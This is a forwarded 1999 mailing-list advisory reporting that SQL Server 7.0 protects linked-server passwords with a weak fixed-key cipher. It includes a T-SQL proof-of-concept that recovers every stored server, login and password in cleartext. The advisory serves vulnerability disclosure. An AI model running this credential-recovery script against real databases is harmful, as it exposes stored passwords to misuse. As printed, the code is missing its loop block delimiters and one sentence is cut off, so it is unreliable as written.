SQL Server 7.0 Linked Server Password Vulnerability (fwd)

From: ah1at_private
Date: Mon Nov 15 1999 - 13:58:57 PST

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    ---------- Forwarded message ----------
    Date: Fri, 12 Nov 1999 15:21:27 -0800
    From: Blake Coverett <blakeat_private>
    To: NTBUGTRAQat_private
    Subject: SQL Server 7.0 Linked Server Password Vulnerability
    /* SQL Server 7.0 Linked Server Password Vulnerability
    SQL Server 7 introduces the ability to link servers.  If the remote server
    is also running SQL Server 7 security credentials can be passed through in
    some unspecified way.  If the remote server is anything else, included SQL
    Server 6.5, linked logins must be setup to map local logins to the login
    name and password to be used on the remote server.  These linked logins and
    passwords are stored in the master..sysxlogins table.  The passwords are
    encrypted with a new, undocumented, built-in function called encrypt()
    before being stored in the password attribute of this table.
    The SQL Server 7 encrypt() function uses an unknown byte-wise stream cipher
    with a fixed key.  That is trivial to break with a chosen plaintext attack
    and such an attack is always available.  The sample code below lists all the
    server, login, password combinations in the table.  Note: deducing a way to
    decode this algorithm required only an examination of the output for
    selected inputs, no reverse engineering of the algorithm itself was
    required.  It is not strictly an XOR against some fixed set of bytes, but
    still no excuse for not using a well-known block cipher, preferably with a
    machine specific key stored with the LSA secrets.
    By default the master..sysxlogins table is only readable with dbo rights in
    master and there is no reason to expect administrators will have relaxed
    these permissions.  There is no obvious exposure from unprivileged accounts,
    but the clear text of the passwords are visible to anyone with admin
    privileges in the database.  This is a bad thing for all the classic
    Sample code: */
    set nocount on
    declare pwd cursor for
    select s.srvname, l.name, l.password from master..sysservers s
    join master..sysxlogins l on s.srvid = l.srvid where l.sid is not null
    for read only
    declare @server varchar(256), @login varchar(256)
    declare @password varbinary(256), @pwdtext nvarchar(128)
    declare @i int, @lsb tinyint, @msb tinyint, @tmp varbinary(256)
    open pwd
    fetch from pwd into @server, @login, @password
    while @@fetch_status = 0
        set @i = 0
        set @pwdtext = N''
        while @i < datalength(@password)
            set @tmp = encrypt(@pwdtext + nchar(0))
            set @lsb = convert(tinyint, substring(@tmp, @i + 1, 1))
                ^ convert(tinyint, substring(@password, @i + 1, 1))
            set @i = @i + 1
            set @tmp = encrypt(@pwdtext + nchar(@lsb))
            set @msb = convert(tinyint, substring(@tmp, @i + 1, 1))
                ^ convert(tinyint, substring(@password, @i + 1, 1))
            set @i = @i + 1
            set @pwdtext = @pwdtext + nchar(convert(smallint, @lsb)
                + 256 * convert(smallint, @msb))
        print @server + ', ' + @login + ', ' + @pwdtext
        fetch from pwd into @server, @login, @password
    deallocate pwd

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